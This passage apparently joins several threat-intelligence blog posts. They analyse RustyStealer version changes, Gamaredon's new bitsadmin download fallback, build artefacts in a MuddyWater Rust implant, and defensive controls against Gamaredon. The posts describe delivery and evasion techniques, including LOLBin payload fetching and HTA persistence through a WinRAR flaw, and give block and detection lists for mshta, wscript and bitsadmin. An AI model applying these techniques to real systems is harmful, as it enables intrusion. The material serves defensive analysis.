I think it’s for architectural cleanup and improved concurrency control.
Obfuscation hardening and decoder abstraction
Compared to version 1.1, version 2.0 further abstracts string decryption and reconstruction logic. Previously visible XOR decoders with fixed constants and static data offsets were refactored into more generic reconstruction helpers and indirect decode routines.
This significantly reduces static signature stability and increases the effort required for automated clustering and YARA-style detection.
Improved memory lifecycle management and cleanup paths
Version 2.0 introduces more explicit cleanup sequences, callback-based destructors and tighter buffer lifecycle handling.
Multiple teardown paths now explicitly free dynamically allocated buffers, invoke destructor callbacks and normalize internal state after large collection operations. It might be an effort to reduce memory leaks, crash probability and long-running instability during high-volume data processing.
Build pipeline evolution
Build artifacts show a different Rust toolchain and build environment compared to version 1.1. Toolchain paths shifted from shared “Archer” layouts towards user-local rustup environments, explaining observed TLSH divergence despite largely stable runtime behavior.
This reflects internal “”””build pipeline”””” changes rather than functional malware changes.
Summary
Version 2.0 prioritizes:
Simplification and rollback of risky experimental I/O designs
Stronger stealth via native API usage and obfuscation hardening
Improved runtime stability and memory hygiene
Reintroduction of host profiling for operational correlation
Internal architectural consolidation rather than feature expansion
Overall, this release reflects a stabilization phase where operational reliability and detection resistance outweigh rapid feature development
Conclusion
If there’s one takeaway from this exercise, it’s that even relatively “boring” commodity implants become surprisingly interesting once you stop treating them as static blobs and start treating them like evolving software projects.
By correlating build artefacts, dependency drift, fuzzy hashes and targeted code diffs, we can reconstruct a fairly coherent development timeline for RustyStealer without having to reverse every single function into oblivion. We see experimentation phases (hello async pipeline), rollbacks when ideas don’t survive real-world friction, hardening towards stealth (dynamic API resolution, entropy injection) and the usual toolchain churn that comes with real developers shipping real code, even if that code happens to be malware. None of this magically turns RustyStealer into some nextgen cyber superweapon. It’s still fundamentally a fairly standard implant doing fairly standard implant things. Also it’s a nice reminder that “grep strings > extract a few IOCs > call it a day” only gets you so far. If you actually want to understand how an actor operates, what they experiment with and where their engineering effort goes, you have to look at trends, not snapshots. Which admittedly takes more time, more coffee and slightly more patience than copy-pasting hashes into VirusTotal buuuut the payoff is a much clearer picture of what’s really going on under the hood.
There’s also a more general lesson in all of this imo
If the goal is to actually understand a threat actor, not just label a sample and move on, then obsessing over individual functions, opcodes and micro-optimizations only gets you part of the way. That level of detail is useful, but it doesnt tell you how the tooling evolves, where engineering effort is invested, which ideas get abandoned or how operational priorities shift over time. These signals live in the truly boring parts: build artefacts, dependency drift, architectural refactors, version churn and the occasional accidental breadcrumb left behind in a binary or wherever. When you line those up over multiple samples, you start seeing intent and process instead of isolated behaviour and this exactly what we want ^-^
In this article, I distinguish between GamaLoad and Pterodo. I still consider GamaLoad a transitional stage, primarily implemented as a defensive layer to slow down analysis rather than as a fundamentally new capability. That said, there are visible changes both in payload delivery and in obfuscation.
I’ll mainly focus on what has changed since my last posts. If you’re interested in the broader context and historical behavior, have a look at the previous articles first.
For this analysis, I pulled the latest Gamaredon sample with the hash:
and dropped it straight into my tracking framework.
From a delivery perspective, not much has changed compared to Gamaredons last shift. The victim still receives a RAR archive as an attachment. When opened or extracted, it drops an HTA file into the Startup folder, infecting the system on the next reboot. A few minutes later, my tracking system already picked up the first fresh GamaLoad samples for analysis.
When comparing these new samples to the December 2025 batch, one thing immediately stood out: they are almost twice as large and noticeably more obfuscated.
(Left column: line count, right column: hash+date)
The obfuscation hasn’t just increased (which, honestly, doesn’t help much given how terrible Gamaredons obfuscation usually is :D), but it has also become slightly smarter.
Historically, their scripts contained tons of junk loops that served absolutely no purpose and could simply be deleted during manual deobfuscation. In the newer samples, however, more variables defined inside those junk blocks are later reused in the actual execution flow.
So if you’re still deobfuscating by hand or your automation isn’t fully mature yet, you’ll want to be a bit more careful here.
(Variable larkxGg is defined in the junk loop, but used after it)
The Interesting Part
A few days ago, I published an article showing how surprisingly easy it is to defend against Gamaredon by blocking a small set of Windows tools such as mshta.exe or MSXML2.XMLHTTP. If you’re honest about it, Gamaredon’s tooling is… let’s say “not exactly impressive”. Blocking a handful of abused LOLBins already makes payload delivery painfully difficult for them. Their development is slow, incremental, and often fairly predictable.
Well, i guess they noticed.
The defensive measures described in that article have now been bypassed. Don’t worry though, we’ll adjust accordingly 😁
Fallback on Fallback: Now Featuring BITS
The new GamaLoad script still relies on a familiar fallback structure to retrieve and execute payloads from their delivery infrastructure.
Conceptually, this is very simple: the script keeps trying different URLs until one successfully returns a payload. If everything fails, an empty string is returned.
What’s new is that this fallback logic now has… another fallback.
If no payload stage can be retrieved via the usual mechanisms, the script switches to downloading the payload using bitsadmin.
What is bitsadmin?
bitsadmin is a Windows utility used to control the Background Intelligent Transfer Service (BITS), which provides reliable background downloads and uploads. Attackers abuse it as a Living-off-the-Land Binary (LOLBin) to quietly retrieve payloads without dropping additional tooling onto disk.
From an attacker’s perspective, BITS has some very attractive properties:
resilient background transfers
native proxy support
high reliability on unstable networks
no obvious “malware-looking” process tree
exactly the kind of boring enterprise plumbing malware loves to hide in ^^
Why Gamaredon Switched to BITS
For years, Gamaredon heavily relied on classic LOLBins such as mshta.exe and MSXML2.XMLHTTP for payload delivery and execution. By now, these techniques are:
blocked by default in many environments (AppLocker, ASR rules, EDR hardening)
it is actively used by Windows itself (Windows Update, Defender, Office, etc.)
blocking it outright often creates operational risk in enterprise environments
its network traffic looks boring and legitimate (svchost.exe, Microsoft-like headers)
it works reliably behind proxies and restrictive networks
if your previous delivery pipeline keeps getting kicked in the teeth by defenders, BITS is a logical next step even for an actor whose tooling evolution is usually measured in geological time.
EDIT 2026-01-18: I published a follow-up article analyzing the evolution and version history of the latest RustyStealer samples, focusing on change tracking, tooling evolution, and architectural shifts across multiple builds
Today I was bored, so I decided to take a short break from Russian threat actors and spend a day with our friends from Iran instead. I grabbed a sample attributed to MuddyWater (hash: "f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f", sample from here) and originally planned to do a fairly standard malware analysis.
That plan lasted about five minutes.
What started as a normal sample quickly turned into something much more interesting for me: the developer didn’t properly strip the binary and left behind a lot of build artefacts, enough to sketch a pretty solid profile of the development toolchain behind this malware.
In this post I won’t go into a full behavioral or functional analysis of the payload itself. Instead, I’ll focus on what we can learn purely from the developers mistakes, what kind of profile we can derive from them and how this information can be useful for clustering and campaign tracking. A more traditional malware analysis of this sample will follow in a future post.
Quick Context: Who Is MuddyWater Anyway?
Before going any further, a quick bit of context on MuddyWater, because this part actually matters for what follows.
MuddyWater is a long-running Iranian threat actor commonly associated with the Iranian Ministry of Intelligence and Security (MOIS). The group is primarily known for espionage-driven operations targeting government institutions, critical infrastructure, telecommunications and various organizations across the Middle East and parts of Europe.
This is not some random crimeware operator copy-pasting loaders from GitHub like script kiddies. We’re talking about a mature, state-aligned actor with a long operational history and a fairly diverse malware toolkit.
Which is exactly why the amount of build and development artefacts left in this sample is so interesting.
The initial sample is a .doc file. Honestly, nothing fancy just a Word document with a macro that reconstructs an EXE from hex, writes it to disk and executes it. Classic stuff.
While the payload shows a clear shift towards modern Rust-based tooling, the document dropper still relies on “obfuscation” techniques that wouldn’t look out of place in early 2000s VBA malware. Turning strings into ASCII integers and adding unreachable trigonometric conditions mostly just makes human analysts roll their eyes. It provides essentially zero resistance against automated analysis, but hey, let’s move on.
Extracting the Payload
To extract the binary cleanly, I wrote a small Python script:
CLICK TO OPEN
# Author: Robin Dos
# Created: 10.01.2025
# This scripts extracts binary from a muddywater vba makro
#!/usr/bin/env python3
import re
import sys
from pathlib import Path
import olefile
DOC = Path(sys.argv[1])
OUT = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("payload.bin")
STREAM = "Macros/UserForm1/o"
def main():
if not DOC.exists():
raise SystemExit(f"File not found: {DOC}")
ole = olefile.OleFileIO(str(DOC))
try:
if not ole.exists(STREAM.split("/")):
# list streams for troubleshooting
print("stream not found. Available streams:")
for s in ole.listdir(streams=True, storages=False):
print(" " + "/".join(s))
raise SystemExit(1)
data = ole.openstream(STREAM.split("/")).read()
finally:
ole.close()
# Extract long hex runs
hex_candidates = re.findall(rb"(?:[0-9A-Fa-f]{2}){200,}", data)
if not hex_candidates:
raise SystemExit("[!] No large hex blob found in the form stream.")
hex_blob = max(hex_candidates, key=len)
# clean (jic) and convert
hex_blob = re.sub(rb"[^0-9A-Fa-f]", b"", hex_blob)
payload = bytes.fromhex(hex_blob.decode("ascii"))
OUT.write_bytes(payload)
print(f"wrote {len(payload)} bytes to: {OUT}")
print(f"first 2 bytes: {payload[:2]!r} (expect b'MZ' for PE)")
if __name__ == "__main__":
main()
In the end I get a proper PE32+ executable, which we can now analyze further.
If we check the hash on VirusTotal, we can see that the file is already known, but only very recently:
We also get multiple attributions pointing toward MuddyWater:
So far, nothing controversial, this is a MuddyWater RustyStealer Sample as we’ve already seen before.
Build Artefacts: Where Things Get Interesting
Now that we have the final payload, I loaded it into Ghidra. First thing I always check: strings.
And immediately something interesting pops up:
The binary was clearly not properly stripped and contains a large amount of leftover build artefacts. Most notably, we can see the username “Jacob” in multiple build paths.
No, this does not automatically mean the developers real name is Jacob. But it does mean that the build environment uses an account named Jacob and that alone is already useful for clustering.
I went through all remaining artefacts and summarized the most interesting findings and what they tell us about the developer and their environment.
This is actually quite useful information, because many malware authors either:
build on Linux and cross-compile for Windows or
use the GNU toolchain on Windows
Here we’re looking at a real Windows dev host with Visual C++ build tools installed
Username in Build Paths
C:\Users\Jacob\
Again, not proof of identity, but a very strong clustering indicator. If this path shows up again in other samples, you can (confidently) link them to the same build environment or toolchain.
Build Quality & OPSEC Trade-Offs
The binary contains:
panic strings
assertion messages
full source paths
Examples:
assertion failed: ...
internal error inside hyper...
Which suggests:
no panic = abort
no aggressive stripping
no serious release hardening focused on OPSEC
development speed and convenience clearly won over build sanitization
Which is honestly pretty typical for APT tooling, but this is still very sloppy ngl
Dependency Stack & Framework Fingerprint
Crates and versions found in the binary:
atomic-waker-1.1.2
base64-0.22.1
bytes-1.10.1
cipher-0.4.4
ctr-0.9.2
futures-channel-0.3.31
futures-core-0.3.31
futures-util-0.3.31
generic-array-0.14.7
h2-0.4.12
hashbrown-0.15.5
http-1.3.1
httparse-1.10.1
http-body-util-0.1.3
hyper-1.7.0
hyper-tls-0.6.0
hyper-util-0.1.16
icu_normalizer-2.0.0
idna-1.1.0
indexmap-2.11.0
ipnet-2.11.0
iri-string-0.7.8
mio-1.0.4
percent-encoding-2.3.2
rand-0.6.5
reqwest-0.12.23
smallvec-1.15.1
socket2-0.6.0
tokio-1.47.1
tower-0.5.2
universal-hash-0.5.1
url-2.5.7
utf8_iter-1.0.4
want-0.3.1
windows-registry-0.5.3
What information we can extract from this:
Network Stack
Async HTTP client (reqwest)
Full hyper stack (hyper, hyper-util, http, httparse)
HTTP/1.1 and HTTP/2 support (h2)
TLS via Windows Schannel (hyper-tls)
Low-level socket handling (socket2, mio)
So this is very clearly not basic WinInet abuse or some minimal dl logic It’s somehwat a full-featured HTTP client stack assembled from modern Rust networking libs, with proper async handling.
Looks much more like a persistent implant than a simple one-shot loader.
Async Runtime
tokio
futures-*
atomic-waker
This strongly suggests an event-driven design with concurrent tasks, typical for beaconing, task polling and long-running background activity.
Not what you would expect from a disposable stage loader.
Crypto
cipher
ctr
universal-hash
generic-array
plus base64
Active use of AEAD-style primitives, very likely AES-GCM or something close to it.
Which looks for me like:
encrypted embedded configuration
and/or encrypted C2 communication
Either way, encryption is clearly part of the design
rustc-demangle
Also one telling artefact is the presence of source paths from the rustc-demangle crate, including references to .llvm./rust/deps/.../src/lib.rs
These are build-time paths leaking straight out of the developers Cargo environment. In my opinion this means that panic handling and backtrace support were left enabled, instead of using an aggressive panic=abort and stripping strategy.
This was almost certainly built locally on the developers Windows workstation or VM. Just someone hitting cargo build on their dev box. Relatable, honestly
Compiler Version (Indirectly)
Multiple references to:
/rustc/ded5c06cf21d2b93bffd5d884aa6e96934ee4234/
This is the Rust compiler commit hash.
That allows fairly accurate mapping to a Rust release version (very likely around Rust 1.92.0)
This is not just a single-purpose loader This is a modular implant much closer to a full backdoor framework than a simple dropper.
What This Tells Us About the Developer & Operation
Technical Profile
Rust developer
works on Windows
uses MSVC toolchain
builds locally, not via CI
comfortable with async networking
understands TLS and proxy handling
Operational Assumptions
expects EDR solutions (found a lot of AV related strings, but not to relevant tbh)
expects proxy environments
targets corporate networks
uses modular architecture for flexibility
OPSEC Choices
prioritizes development speed
does not heavily sanitize builds
accepts leakage of build artefacts (LOL)
Which again fits very well with how many state aligned toolchains are developed: fast iteration, internal use and limited concern about reverse-engineering friction
From a threat hunting perspective, these artefacts are far more useful than yet another short-lived C2 domain, they allow us to track the toolchain, not just the infrastructure
What Build Artifacts Reveal About Actor Development
Build artifacts embedded in operational malware are more than just accidental leaks they offer a look into an actors internal development maturity. Exposed compiler paths, usernames, project directories or debug strings strongly suggest the absence of a hardened release pipeline. In mature development environments, build systems are typically isolated, stripped of identifiable metadata and designed to produce reproducible, sanitized artifacts. When these indicators repeatedly appear in live payloads, it points to ad-hoc or poorly automated build processes rather than a structured CI/CD workflow The continued presence of build artifacts across multiple campaigns is particularly telling. It indicates not just a single operational mistake, but a lack of learning or feedback integration over time. Actors that actively monitor public reporting and adapt their tooling usually remediate these issues quickly. Those that do not reveal organizational constraints, limited quality assurance or sustained time pressure within their development cycle. I’ll start to do some more research about MuddyWater in the next few weeks to get a better understanding weather this was a single incident or a general problem in MuddyWaters development process. Leaving build artefacts in your malware is rarely about “oops, forgot to strip the binary” It’s more a side effect of how development, testing and deployment are glued together inside the operation. From a defenders POV, that’s actually way more useful than yet another throwaway C2 domain / IP. These artefacts don’t rotate every week they give you fingerprints that can survive multiple campaigns.
This is the result of a lengthy analysis and study of the Gamaredon UAC-0010 group. I recommend reading my previous articles for more context.
Defending against Gamaredon is uncomfortable not because the group uses particularly advanced malware, but because it forces defenders to question many assumptions that modern security strategies are built on.
Gamaredon does not rely on sophisticated exploits, stealthy implants or long-lived infrastructure. Instead it operates through large volumes of simple scripts, constantly changing delivery mechanisms and an infrastructure that is designed to burn fast and disappear. Indicators of compromise age out quickly, payloads are interchangeable and even the tooling itself adapts once it becomes the subject of analysis.
Over the past months, tracking Gamaredon has felt less like reverse engineering a malware family and more like observing a process in motion. Loader scripts evolve, obfuscation shifts slightly from wave to wave and infrastructure changes just enough to break automated collection pipelines. At times, analysis environments are actively identified and fed with destructive or misleading payloads, which turns the act of investigation itself into a signal the actor seems to react to.
This makes Gamaredon a poor fit for traditional, indicator driven defense models. Blocking hashes, domains or IP addresses provides short-lived relief at best. By the time a rule is deployed, the campaign maybe has already moved on. What remains stable is not the malware, but the behavior: how access is gained, how scripts are executed, how network communication deviates from normal client behavior and how the actor responds when it detects scrutiny.
This article focuses on defensive measures that have proven effective while actively observing Gamaredon operations in the wild. The goal is not to “out-APT” the attacker, but to break the operational assumptions that Gamaredon relies on: permissive script execution, weak visibility into client behavior and an overreliance on static threat intelligence.
Defending against Gamaredon is less about stopping a specific toolset and more about disrupting a workflow. Once that distinction is understood, the problem becomes significantly more manageable 🙂
What End Users Can Do to Reduce Risk
Remember: Gamaredon does not break into systems. It is invited in
1. Attachments are the attack surface
Gamaredon infects systems through spear phishing. End users who have received appropriate training therefore significantly reduce the risk of infection. Modern phishing campaigns, particularly those operated by actors like Gamaredon, do not rely on obvious deception or complex exploit, they exploit trust in routine actions. An email attachment that appears harmless is can be nothing more than a delivery mechanism for script execution. Shortcuts, script files or archive formats are are instructions, not documents.
For this reason, email attachments should never be opened impulsively. Files originating from unknown senders, unexpected conversations or unclear contexts must always be routed through a defined analysis workflow. This may include automated malware scanning, sandbox execution or escalation to a SOC or security team for manual review.
Treating attachments as executable content rather than documents removes a core assumption attackers rely on: that a single double-click is enough to gain a foothold.
2. “It looks normal” is not a defense
A common assumption in phishing awareness is that malicious emails will “look suspicious.” Misspelled text, strange formatting or obviously fake senders are warning signs. Campaigns operated by Gamaredon routinely break this expectation.
Many of the emails used in these operations are short, plain and unremarkable. They may not contain any obvious red flags, no unusual wording and no visual elements that stand out. In some cases, the message itself is barely relevant at all. The attachment is the real payload.
Relying on visual cues or intuition to assess whether an email is safe is therefore considered to be ineffective. A file does not need to look dangerous to be dangerous. Shortcuts, script files and archived attachments can appear entirely legitimate while silently triggering code execution in the background.
This is intentional. Gamaredon does not attempt to impress the recipient or convince them emotionally. Instead, it blends into routine communication, where opening an attachment feels like a harmless, almost automatic action.
For this reason, the absence of suspicious indicators are better off never be treated as confirmation of safety. Normal looking emails are not evidence of harmless content, they are often the environment in which these campaigns are most successful.
3. Why double-clicking is dangerous
Most people treat double-clicking as a harmless, almost meaningless action. It is how you open a document, check an image,or quickly look at a file someone sent you. From a usability perspective, that makes sense. From a security perspective, it is exactly the problem.
Not every file is a document! Many files are nothing more than instructions telling Windows to execute other programs, run scripts or fetch additional content from the internet. When you double-click those, you are not “previewing” anything. You are actively starting a process chain.
What makes this especially effective is how unspectacular it looks. In many Gamaredon cases the initial file does almost nothing visible. Maybe a window flashes, sometimes nothing happens at all. From the users point of view, that feels like a failed or broken attachment. From the attackers POV the important part already happened: code execution in user context.
This is not accidental. Gamaredon does not need the first file to be powerful. It only needs it to run. The rest can be downloaded, replaced or updated later. The initial step is small, quiet and easy to overlook.
That is why “just opening it to see what it is” is not a safe strategy. With many attachment types, execution is the first and only action. There is no confirmation dialog, no warning and no visible sign that anything meaningful happened until much later, when the real payload is already in place.
tldr: double-clicking is not a neutral action. It is a trust decision and attackers like Gamaredon build their entire delivery chain around the assumption that this trust will be given automatically. Gamaredon can be avoided if you stop trusting the files you are about to open . As Lenin said “доверяй, но проверяй” 😉
4. Update. Update. Update.
Always keep the software on your system up to date. Gamaredon has actively exploited real-world vulnerabilities, for example a WinRAR vulnerability “CVE-2025-6218” observed in campaigns since late 2025.
This vulnerability allows an attacker to place a malicious file into the Windows startup folder when an archive is opened or extracted. The user may only see a normal archive being unpacked, while persistence is already being established in the background and the system becomes infected after the next reboot. This is exactly the kind of low-effort, high-impact technique that fits Gamaredons operational model.
Keeping your software updated, especially tools that handle downloaded files such as archive managers, removes entire classes of attack techniques.
5. When to escalate
One of the most reliable defenses attackers have is silence. Not because nothing happened, but because users assume that whatever happened is probably not important enough to bother anyone with.
“This file didn’t open properly” “The window flashed and disappeared” “Nothing seems broken so it’s probably fine”
From the perspective of an attacker, this is perfect. Initial access does not necessarily need to be loud, it only needs to be unnoticed.
The first-stage file doesn’t display an error message, ransomware screen or any obvious sign of compromise. It executes, exits and waits for the next step. If no one reports it, there is nothing to investigate, nothing to contain and nothing to learn from.
Users hesitate to report something because they do not want to be wrong, do not want to interrupt anyone or assume that security teams only care once things are clearly broken. Unfortunately, by the time something is clearly broken, the attacker has already achieved most of their objectives.
From a defensive POV the ideal time to escalate is when you are unsure whether something must have happened at all and not when you are sure something malicious happened.
If an attachment behaves strangely or if a file does not open as expected, if a website triggers download you did not request or if anything simply feels off, that is already enough reason to report it. Security teams do not need certainty. They need signals. It’s better to report one more false positives to your security team then not reporting it.
Yes, most reports will turn out to be harmless. That is fine. What is not fine is missing the few cases that actually matter because no one wanted to be the person who raised a false alarm.
tldr: if something looks broken, weird or pointless, that is not a reason to ignore it. That is exactly when escalation is supposed to happen. The worst possible outcome of reporting is a short investigation. The worst possible outcome of not reporting is an attacker quietly staying in your network.
Defensive Controls for System and Network Administrators
1. Kill the script layer
Gamaredons operations depend almost entirely on script-based execution. VBScript, JS, HTA files and shortcut-based loaders are the foundational tools. Without the ability to execute scripts in user context, the majority of observed Gamaredon infection chains fail before any payload is delivered.
This makes the script execution layer a highly effective choke point for defenders.
In many environments, script interpreters such as wscript.exe, cscript.exeor mshta.exe are still broadly available to all users, despite having little to no legitimate business use. From an attackers perspective, this provides a reliable and low-friction execution environment that does not require exploits, elevated privileges or complex tooling.
Restricting or disabling these components significantly raises the cost of an attack. Blocking mshta.exe entirely, enforcing execution policies for VBScript and JScript and preventing script execution from user-writable locations such as Downloads, Tempor profile directories removes a critical assumption Gamaredon relies on: that scripts will execute by default.
Where complete blocking is not feasible, strict allow-listing needs to be applied. Script execution should be limited to known, signed,and explicitly required use cases. Everything else should fail closed.
It is important to note that this is not merely a prevention measure, but also a detection opportunity. Script-based attacks are very noisy at the process level. Parent-child relationships such as email clients spawning script hosts or shortcut files launching interpreters provide strong, behavior based signals that are far more stable than file hashes or domains.
Defenders mostly focus on detecting the final payload. Against Gamaredon, this approach is too late. By the time a second stage binary is downloaded, the attacker has already achieved their primary goal: execution. Eliminating or tightly controlling the script layer prevents this first and most critical step.
Option 1: Disable mshta.exe
mshta.exe has virtually no legitimate use in modern enterprise environments and is heavily abused by Gamaredon
This alone stops most VBS- and JS-based Gamaredon loaders. It’s also a good defense against other Threat Actors, since Gamaredon is not the only one to use the methods
Option 3: Block Script Exec from User-Writable Paths
Gamaredon relies on execution from:
Downloads
%TEMP%
%APPDATA%
Email attachment paths
Apply to:
.vbs
.js
.hta
.lnk
Prevents double-click execution even if scripts are not fully disabled
Option 4: If Blocking is impossible – Make It Visible
Some environments cannot fully disable scripts. In that case, visibility is mandatory.
Enable Script Block Logging:
Computer Configuration
> Administrative Templates
> Windows Components
> Windows PowerShell
Enable:
Turn on Script Block Logging
Turn on Module Logging
Enable Command Line Proccess Auditing
Computer Configuration
> Administrative Templates
> System
> Audit Process Creation
Enable:
Include command line in process creation events
This enables:
Event ID 4688
Parent/Child relationships:
outlook.exe > wscript.exe
explorer.exe > mshta.exe
Option 5: YARA on Email Attachments
One of the most effective defensive layer that is underestimated in Gamaredon-style campaigns is attachment scanning at the email gateway using YARA rules.
A large part of Gamaredons initial access relies on script-based loaders delivered directly as attachments (HTA, VBS, JS, LNK) most of the time inside archives (abusing Winrar CVE since end of 2025), scanning files before they ever reach the user can break the infection chain at the earliest possible stage.
YARA is particularly useful here because it does not rely on file hashes or exact filenames. Structural patterns, script constructs and typical obfuscation techniques tend to remain relatively stable even when the surrounding delivery changes. That makes YARA a good fit for detecting families of loaders rather than individual samples.
Applied at the mail gateway or in attachment processing pipelines, YARA rules can prevent execution entirely instead of trying to detect activity after the user already clicked the file. From a defensive POV, that is always the better place to intervene.
I maintain a set of YARA rules specifically focused on Gamaredon loader patterns, including HTA- and VBScript-based stages observed from older and recent campaigns. These rules are meant for legitimate research and defensive use. If you are working in a security or incident response context and want to test or deploy them, feel free to contact me and I can provide them for evaluation and tuning.
YARA will not stop infrastructure shifts or payload changes, but it is very effective at removing large parts of the delivery layer that Gamaredon depends on. Combined with script execution controls and network visibility (read above), it significantly reduces the attackers room to operate.
Option 6: Shortcut (LNK) Abuse Mitigation
Gamaredon frequently abuses .lnk files as script launchers.
Controls:
Block .lnk execution from email attachment paths
Alert on:
LNK spawning wscript, mshta, powershell
Disable preview handlers for LNK in mail clients if possible
Option 7: Block / Restrict bitsadmin
This should be an addition, not just an option As a fallback for msxmlhttp, Gamaredon introduced bitsadmin in their newest Gamaload Samples as an additional fallback, you can read more about it here.
Disabling BITS entirely is not an option in most enterprise environments. Windows Update, Defender, SCCM and many enterprise management tools depend on it. Breaking BITS usually means breaking business.
The goal is therefore not to kill BITS, but to remove its value as a reliable malware loader.
Gamaredon doesn’t need stealthy tooling. They need something that works everywhere, survives bad networks and doesn’t get blocked. If you take away that reliability, the technique quickly becomes unattractive.
Below are several practical controls that achieve exactly that:
Block bitsadmin.exe, not BITS
bitsadmin.exe is merely a legacy command-line frontend for BITS. Modern software uses PowerShell or native APIs instead. In most environments, nothing legitimate depends on interactive use of bitsadmin.exe.
Scope: non-admin or Everyone, depending on your policy
Impact
Windows Update continues to work
Defender continues to work
SCCM and management tooling remain unaffected
But… Malware loses the easiest way to create BITS jobs
Why this hurts Gamaredon
Gamaredons loaders frequently invoke BITS directly from scripts and HTA stages. They rely on simple CLI execution, not on robust API-based fallbacks. Blocking the binary often breaks the entire staging chain
Restrict Where BITS Is Allowed to Connect
BITS traffic is still regular HTTP/HTTPS traffic. It can and should be controlled at the network layer!
Control
On proxy or firewall level:
Allow BITS traffic only to:
Microsoft update endpoints
Internal patching infrastructure
Explicitly approved business domains
Block or inspect everything else.
Optional detection:
Alert on User-Agent: Microsoft BITS/* connecting to non-whitelisted domains.
Impact
Business traffic remains unaffected
Updates continue to function
External drop servers used by attackers fail reliably!
This is a strong IOC-less control that scales well in enterprise environments 🙂
Disrupt BITS Job Persistence
One of BITS advantages for attackers is job persistence: jobs survive logoffs, reboots and network interruptions.
Removing that persistence dramatically reduces reliability for staged malware delivery.
Control
Regularly purge queued jobs:
PowerShell example:
Get-BitsTransfer -AllUsers | Remove-BitsTransfer
Schedule this on workstations every 30–60 minutes (adjust to your needs)
Impact
Normal short-lived update jobs typically complete unaffected
Malware loses reliable staging and retry capability
Use caution during large enterprise software rollouts, this is also not the most effective way imo
Enforce Strong Telemetry on BITS Usage
As I already mentioned, if you cannot block it safely everywhere, make abuse visible!
Control
Enable command-line process auditing
Monitor:
Execution of bitsadmin.exe
Parent processes such as mshta.exe, wscript.exe
Correlate with network destinations and file writes
Impact
No production risk
High-quality detection signal
Low false-positive rate
Remember: BITS usage initiated from scripting engines is rarely legitimate
Behavioral Heuristics for BITS Abuse
For mature environments and advanced detection platforms:
Monitor for suspicious patterns such as:
BITS downloads into:
%TEMP%
%APPDATA%
User profile writable paths
Randomized file names
Short-lived jobs followed immediately by execution
Non-corporate TLS destinations
This can be implemented via:
ETW telemetry
Defender Advanced Hunting
Custom sensors and collectors
Provides behavioral detection without relying on static indicators
Visibility beats prevention
At minimum, you need to have visibility into:
wscript.exe (classic VBS/JS execution)
cscript.exe (same, console version)
mshta.exe (HTA execution, including embedded VBScript/JS)
powershell.exe (still relevant, second stage)
But execution alone is only half of the picture here. In Gamaredon campaigns script hosts are usually paired with built-in Windows networking components, MSXMLHTTP.
Inside the script, outbound communication is handled via this compnents (mostly):
MSXML2.XMLHTTP
MSXML2.ServerXMLHTTP
From the outside, this generally looks like a normal process making web requests. There is no external downloader, no suspicious binary and no obvious command line indicator, since everything happens inside the script host process itself.
That means defenders should not only care that a script host started, but also whether that process immediately initiated network connections. Script execution without network activity might be a test or a failure. Script execution followed by HTTP traffic is the actual attack.
If your telemetry cannot correlate:
script execution
with outbound connections
and with the destination domain or IP
then you are missing the exact phase where Gamaredon (or other Threat Actors) transitions from initial access to payload delivery.
tldr; seeing the script start is useful. Seeing the script talking to the internet is what actually tells you that the infection chain is active
Alert on Parent-Child Process Chains, Not on Filenames
Gamaredon changes filenames constantly. That is not where stability is.
What does not change:
Email client -> script host
Explorer -> shortcut -> script host
Script host -> network activity
Those relationships are far more reliable than any hash or URL
If your detection logic is still focused on “known bad files”, you are solving yesterdays problem. Behavior survives infrastructure rotation … but IOCs do not
Treat Failed Infections as Intelligence, Not as Non-Events
One of the more frustrating patterns when tracking Gamaredon is how many times infection attempts partially fail. The loader runs, the payload is blocked or the network request never completes.
From an incident-response POV it could be treated as “problem solved”.
From an intelligence perspective, i think that it’s a gift.
Those events tell you:
Which attachment types are used
Which execution paths are attempted
Which infrastructure is currently active
If you only investigate successful infections, you will always be late. The campaigns that fail today are the ones that succeed tomorrow with minor adjustments. If you understand Gamaredon properly, you can always be a step ahead.
Accept That Something Will Slip Through – Just Plan Around That
Perfect prevention is a nice idea, but ideas are just ideas. It is not how real environments work.
Gamaredon does not need persistence for months. It needs minutes of execution. If those minutes go unnoticed, the damage is already done, regardless of whether the payload later gets removed.
Your defensive strategy needs to assume:
Some scripts will execute
Some attachments will be opened
Some rules will be bypassed
The question here is whether anyone notices in time to react.
Visibility does not replace prevention at all. But without visibility, prevention failures become silent compromises. And silent compromises are exactly what this actor benefits from. You could say that visibility complement your prevention efforts.
Network controls that matter
From a network POV, Gamaredon is not noisy. It does not deploy custom backdoors that beacon every few seconds and it does not rely on exotic protocols. Most of the traffic is simple http(s) generated directly from scripts using tools like MSXML2.XMLHTTP.
That has two important consequences for defenders.
First, there is no separate downloader process to catch. The same process that executed the script is now making web requests. Just mshta.exe or wscript.exe talking to the internet like a perfectly normal Windows application.
Second, many network controls are designed around detecting known bad destinations, not suspicious clients. If you only look at where traffic goes, but not who is sending it and under which circumstances, you miss the entire initial delivery phase.
For Gamaredon style campaigns network defense has to focus on context, NOT just destination.
Correlate Network Traffic With Process Activity
If a script host executes and immediately initiates outbound connections, that is not normal workstation behavior.
At minimum, be able to answer:
Which process opened the connection?
What launched that process?
What file triggered the execution?
MSXMLHTTP-based traffic will look perfectly legitimate on the wire unless you know it came from a script that just executed from a mail attachment.
Normalize Outbound HTTP Behavior
One of the more uncomfortable lessons when tracking Gamaredon is that attackers actively use network behavior itself as a detection mechanism.
In several waves, delivery depended on whether certain headers, (in the latest Gamaload Samples) especially Content-Length, matched what the script originally set. Many commercial proxy setups modify requests by:
re-encoding bodies
switching between chunked and fixed-length transfers
inspecting and rewriting traffic
From the attackers side, that becomes a cheap and reliable way to identify analysis environments and block payload delivery.
Defensively, this means:
Outbound traffic needs to be as predictable and uniform as possible
Proxy behavior should be consistent across user and analysis environments
Sudden header manipulation should be considered a detection signal, not just a networking detail!!!
Otherwise, you end up with the worst possible situation: real users get infected, while analysis systems receive fake or destructive payloads
DNS as a detection surface
Treat DynDNS and Low-Rep Domains as High-Risk by Default
Gamaredon infrastructure heavily relies on:
dynamic DNS providers
rapidly changing subdomains
short-lived hosting setups
Blocking individual domains is pointless. They rotate too fast. What does not change is the type of infrastructure being used.
From a defensive standpoint, this means:
DynDNS traffic has to be restricted, monitored or at least flagged
Newly registered domains should not be treated the same as established ones
DNS telemetry is worth as part of detection logic, not just resolution
If your network policy implicitly trusts any domain that resolves, you are trusting exactly the layer Gamaredon is built on
What to Monitor Instead of Chasing Domains
DNS telemetry provides several signals that remain useful even when infrastructure rotates:
